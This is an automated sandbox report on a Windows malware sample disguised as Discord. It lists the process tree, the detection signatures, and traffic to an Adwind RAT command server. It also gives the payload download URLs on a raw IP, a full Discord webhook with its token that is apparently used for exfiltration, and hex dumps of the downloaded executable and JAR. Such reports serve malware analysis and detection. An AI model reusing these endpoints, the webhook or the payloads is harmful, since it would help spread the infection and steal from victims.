Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
S3zoj9Uts0.exe

Overview

General Information

Sample Name:S3zoj9Uts0.exe
Analysis ID:798180
MD5:94ccb92b775297f357670abd1e6f754b
SHA1:50a9d6f7828c193c965ff9c5df8bc290b06122a8
SHA256:a4c3028eddea3f36439b4b4aba7c1511f7b39dd0a92f38a282968d259d8e3286
Tags:exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Drops executable to a common third party application directory
Machine Learning detection for sample
Machine Learning detection for dropped file
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Uses cacls to modify the permissions of files
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • S3zoj9Uts0.exe (PID: 1172 cmdline: C:\Users\user\Desktop\S3zoj9Uts0.exe MD5: 94CCB92B775297F357670ABD1E6F754B)
    • javaw.exe (PID: 3372 cmdline: "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar" MD5: 4BFEB2F64685DA09DEBB95FB981D4F65)
      • icacls.exe (PID: 3048 cmdline: C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 4904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • discord.exe (PID: 5836 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe" MD5: 94CCB92B775297F357670ABD1E6F754B)
    • javaw.exe (PID: 5944 cmdline: "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar" MD5: 4BFEB2F64685DA09DEBB95FB981D4F65)
  • discord.exe (PID: 3160 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe" MD5: 94CCB92B775297F357670ABD1E6F754B)
    • javaw.exe (PID: 4904 cmdline: "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar" MD5: 4BFEB2F64685DA09DEBB95FB981D4F65)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

Timestamp:192.168.2.423.94.99.1194969813372853044 02/03/23-20:40:09.381307
SID:2853044
Source Port:49698
Destination Port:1337
Protocol:TCP
Classtype:A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: S3zoj9Uts0.exeReversingLabs: Detection: 28%
Source: S3zoj9Uts0.exeVirustotal: Detection: 31%Perma Link
Antivirus / Scanner detection for submitted sample
Source: S3zoj9Uts0.exeAvira: detected
Antivirus detection for URL or domain
Source: http://23.94.99.119/discord.jarAvira URL Cloud: Label: malware
Source: http://23.94.99.119/discord.exeAvira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeAvira: detection malicious, Label: HEUR/AGEN.1217604
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeReversingLabs: Detection: 28%
Machine Learning detection for sample
Source: S3zoj9Uts0.exeJoe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.4:49697 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.4:49699 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.4:49701 version: TLS 1.2
Source: S3zoj9Uts0.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\akate\source\repos\MAHAServer\MAHA\obj\Debug\discord.pdb source: S3zoj9Uts0.exe, 00000000.00000000.309170814.00000000001D2000.00000002.00000001.01000000.00000003.sdmp, S3zoj9Uts0.exe, 00000000.00000002.577854090.00000000024B1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\akate\source\repos\MAHAServer\MAHA\obj\Debug\discord.pdbR source: S3zoj9Uts0.exe, 00000000.00000000.309170814.00000000001D2000.00000002.00000001.01000000.00000003.sdmp, S3zoj9Uts0.exe, 00000000.00000002.577854090.00000000024B1000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

Networking

barindex
Snort IDS alert for network traffic
Source: TrafficSnort IDS: 2853044 ETPRO TROJAN Java/Adwind Variant CnC Activity 192.168.2.4:49698 -> 23.94.99.119:1337
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: POST /api/webhooks/1061591881189961839/KwqGODsud5jnEMwoLx_f6PdyZpFgjhKU-fUjwmwXiSSOBri5CuGLlgGvA4a7d18uh4zS HTTP/1.1Content-Type: application/jsonHost: canary.discord.comContent-Length: 62Expect: 100-continueConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1061591881189961839/KwqGODsud5jnEMwoLx_f6PdyZpFgjhKU-fUjwmwXiSSOBri5CuGLlgGvA4a7d18uh4zS HTTP/1.1Content-Type: application/jsonHost: canary.discord.comContent-Length: 62Expect: 100-continueConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1061591881189961839/KwqGODsud5jnEMwoLx_f6PdyZpFgjhKU-fUjwmwXiSSOBri5CuGLlgGvA4a7d18uh4zS HTTP/1.1Content-Type: application/jsonHost: canary.discord.comContent-Length: 62Expect: 100-continueConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /discord.exe HTTP/1.1Host: 23.94.99.119Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /discord.jar HTTP/1.1Host: 23.94.99.119
Source: Joe Sandbox ViewIP Address: 162.159.138.232 162.159.138.232
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 03 Feb 2023 19:39:59 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0Last-Modified: Mon, 30 Jan 2023 14:08:02 GMTETag: "7800-5f37bbe46bd01"Accept-Ranges: bytesContent-Length: 30720Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7b 69 01 d9 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 6e 00 00 00 08 00 00 00 00 00 00 7e 8c 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2a 8c 00 00 4f 00 00 00 00 a0 00 00 d4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 0c 00 00 00 98 8b 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 6c 00 00 00 20 00 00 00 6e 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d4 05 00 00 00 a0 00 00 00 06 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 00 00 00 02 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 8c 00 00 00 00 00 00 48 00 00 00 02 00 05 00 94 29 00 00 d4 1c 00 00 03 00 02 00 13 00 00 06 68 46 00 00 30 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 02 28 19 00 00 0a 00 00 2a 00 00 13 30 02 00 39 00 00 00 01 00 00 11 00 7e 01 00 00 04 14 fe 01 0a 06 2c 22 00 72 01 00 00 70 d0 02 00 00 02 28 1a 00 00 0a 6f 1b 00 00 0a 73 1c 00 00 0a 0b 07 80 01 00 00 04 00 7e 01 00 00 04 0c 2b 00 08 2a 00 00 00 13 30 01 00 0b 00 00 00 02 00 00 11 00 7e 02 00 00 04 0a 2b 00 06 2a 22 00 02 80 02 00 00 04 2a 13 30 01 00 0b 00 00 00 03 00 00 11 00 7e 03 00 00 04 0a 2b 00 06 2a 22 02 28 1d 00 00 0a 00 2a 56 73 06 00 00 06 28 1e 00 00 0a 74 03 00 00 02 80 03 00 00 04 2a ce 02 14 7d 04 00 00 04 02 28 1f 00 00 0a 00 00 02 28 11 00 00 06 00 02 7b 08 00 00 04 25 6f 20 00 00 0a 72 3b 00 00 70 28 21 00 00 0a 6f 22 00 00 0a 00 2a 0a 00 2a 0a 00 2a ba 00 72 75 00 00 70 28 23 00 00 0a 26 02 7b 08 00 00 04 25 6f 20 00 00 0a 28 24 00 00 0a 72 8f 00 00 70 28 25 00 00 0a 6f 22 00 00 0a 00 2a ba 00 72 ab 00 00 70 28 23 00 00 0a 26 02 7b 08 00 00 04 25 6f 2
Source: global trafficTCP traffic: 192.168.2.4:49698 -> 23.94.99.119:1337
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 03 Feb 2023 19:39:59 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0Last-Modified: Thu, 26 Jan 2023 03:05:11 GMTETag: "9feb5-5f32204607ff8"Accept-Ranges: bytesContent-Length: 655029Content-Type: application/java-archiveData Raw: 50 4b 03 04 14 00 08 08 08 00 a5 98 39 56 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 49 6c 49 49 6c 4c 6c 6c 49 2f 6c 6c 6c 49 6c 49 6c 49 6c 6c 6c 2f 49 49 6c 6c 6c 6c 6c 49 6c 49 49 6c 2f 6c 49 6c 49 6c 49 49 6c 6c 49 2f 49 49 6c 6c 49 6c 6c 6c 6c 49 49 6c 49 49 49 49 2e 63 6c 61 73 73 d5 3c 07 40 14 47 d7 b3 fb 0e 0e 8e 03 d6 5b 16 59 50 44 44 a4 0a 2a 2e 78 d8 10 44 0f 10 0b ab 02 56 44 04 04 01 01 0b 4a d4 58 63 4c 8f 31 31 cd 96 c4 98 98 c4 44 83 18 13 4b 8a 26 c6 24 a6 1b a3 29 98 de 13 d3 1b ff 9b d9 bd 42 b1 e7 fb f2 fd 78 f7 76 df ec cc 6b f3 de cc bc d9 39 8f fc fd c4 3e 42 48 82 41 e2 c8 40 5b b9 cd 56 9e 55 5e 6e 8b 2b 47 c0 fe 95 97 c7 d9 28 64 b8 ad 3c 4e 2b b6 d1 3a 0c b2 27 b4 c4 66 33 12 8e 23 c2 cc 82 b9 05 71 e5 05 15 c5 71 23 a7 cd 2c 2a ac 35 12 c0 52 5a d5 66 b3 b7 2d b7 71 64 40 d6 45 72 d3 d8 68 64 92 39 e2 63 d3 2a 69 35 90 a0 38 21 cb c9 3b a7 b6 ba b4 a2 98 56 d3 04 b4 e9 64 38 c2 d9 60 72 70 f1 19 fa c4 66 97 9d 92 e0 88 21 22 72 c2 10 8e f8 6a 35 6d ba 6e e5 1c 49 8a 70 a1 9c 5a 5e 50 53 93 9c d5 5a cd 64 5b 64 db 32 8e f4 ee af 5a db 96 0f 6c 43 b0 7f d4 c0 64 55 4d 8e c4 2f 47 42 9c 0f 51 86 a2 e2 82 f2 94 c2 c2 a2 9a 9a a1 f3 0b 8b aa 6a 4b 2b 2b 8c a4 03 47 02 9d b5 c6 cc a9 a8 2d 9d 55 e4 f2 5c 44 7b b0 e7 a5 95 71 b6 91 2e 0f 24 a8 e8 f1 c8 56 98 16 9b 93 66 26 9e c4 e4 49 78 22 43 71 ff 9d 2f 42 f7 93 d3 12 38 32 f8 62 9d c0 66 ef d9 72 ad c8 48 3a d3 0e b7 77 8c 4e 81 23 89 17 62 c5 7c bb 19 e7 d4 96 96 c7 65 95 d6 d4 26 9b 49 17 12 62 22 c1 a4 2b f6 59 cb 67 46 d2 8d 23 1e a5 b5 45 d5 05 b5 95 d5 1c f1 8f 70 6d 6d d3 cb 91 42 77 12 ee 45 c2 48 0f e8 9d 38 61 13 76 71 2b 41 8c 24 8a 23 96 b6 2d 8d 24 86 23 c6 92 82 9a ec a2 f9 b5 1c 81 88 c8 7c 33 e9 49 e2 bc 48 2c 89 87 d0 c4 ad 1d d1 6b 2a d8 33 bf 88 76 fa df 4c fa 90 04 5a b9 2f 47 3a 3a 9f 56 17 cd 28 c7 c7 71 e9 a5 45 e5 d3 8d 24 11 ca b7 de 5d 0b 09 bd 17 e6 62 af 69 76 b6 3b 26 bb e1 48 4f 57 db b5 68 de d2 ef 74 b7 37 93 64 d2 9f 9a 6c 00 e4 97 1d 29 31 13 37 e2 4e 3b 7a 30 94 dc 66 f5 e7 48 f2 65 84 9e 91 a4 a2 b6 7a e0 e9 d1 ac 3d 42 13 46 b4 e8 be 11 05 55 28 ca 50 92 6e 22 69 64 18 47 bc 5b 3c 32 12 6c e1 55 58 59 51 5b 50 5a 51 93 59 54 c7 11 29 a2 ad 0d a9 c9 33 49 96 17 c9 20 23 20 23 7f 11 8e 26 c6 e2 a2 5a b5 ae aa 08 ad d5 c2 ea 9a 53 99 c9 28 32 da 44 92 c8 18 08 7d 3a 0d 87 35 c0 ea 1c 09 6f 8f 76 7b 5d 36 96 8c a3 cc c6 43 67 ef d7 83 39 d2 41 d7 d1 69 03 8e 8c 3e a7 2b b7 ec 9f 0b 1b 29 cc 24 9f 4c 30 61 17 4d 44 79 6b a8 bc 3d da 91 b7 1d 0d c6 99 c9 64 32 85 aa 3b 15 7c 3b 1b c2 21 27 ec a0 0a 83 ae 79 3b 8a 82 5e 14 74 87 84 ed 1e 23 61 92 4f 6e 09 47 dc fb 97 56 94 d6 0e 64 ce 8c 6d 4b c9 4c 13 b1 90 32 c8 b8 a3 ff 2f 2d 46 6f cd 95 8c a4 02 82 0e bf f
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.99.119
Source: S3zoj9Uts0.exe, 00000000.00000002.577854090.000000000249B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.94.99.119
Source: S3zoj9Uts0.exe, 00000000.00000000.309170814.00000000001D2000.00000002.00000001.01000000.00000003.sdmp, S3zoj9Uts0.exe, 00000000.00000002.577854090.0000000002441000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000004.00000002.577897163.00000000023B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.94.99.119/discord.exe
Source: S3zoj9Uts0.exe, 00000000.00000000.309170814.00000000001D2000.00000002.00000001.01000000.00000003.sdmp, S3zoj9Uts0.exe, 00000000.00000002.577854090.00000000024BE000.00000004.00000800.00020000.00000000.sdmp, S3zoj9Uts0.exe, 00000000.00000002.577854090.0000000002441000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000004.00000002.577897163.00000000023B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.94.99.119/discord.jar
Source: S3zoj9Uts0.exe, 00000000.00000002.577854090.000000000249B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.94.99.1194
Source: S3zoj9Uts0.exe, 00000000.00000002.577854090.00000000024BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.94.99.119D8
Source: javaw.exe, 00000001.00000002.581342306.000000000A1D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bugreport.sun.com/bugreport/
Source: S3zoj9Uts0.exe, 00000000.00000002.577854090.00000000024E4000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000004.00000002.577897163.0000000002425000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://canary.discord.com
Source: javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html
Source: javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html#
Source: javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.htmlk
Source: javaw.exe, 00000001.00000002.581342306.000000000A34A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl
Source: javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: javaw.exe, 00000001.00000002.581342306.000000000A34A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
Source: javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.581342306.000000000A34A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: javaw.exe, 00000001.00000002.581342306.000000000A34A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl
Source: S3zoj9Uts0.exe, 00000000.00000002.575985804.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.0000000004DFE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: javaw.exe, 00000005.00000002.577426840.00000000049FB000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.00000000049FB000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: javaw.exe, 00000001.00000002.577304920.0000000004DFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl3#?
Source: javaw.exe, 00000001.00000002.577304920.0000000004DFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl3N?
Source: javaw.exe, 00000001.00000002.581342306.000000000A34A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.0000000009F46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: javaw.exe, 00000001.00000002.581342306.000000000A42B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.577304920.00000000050F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.581457717.000000000A025000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.577426840.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000007.00000002.577148381.00000000056D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
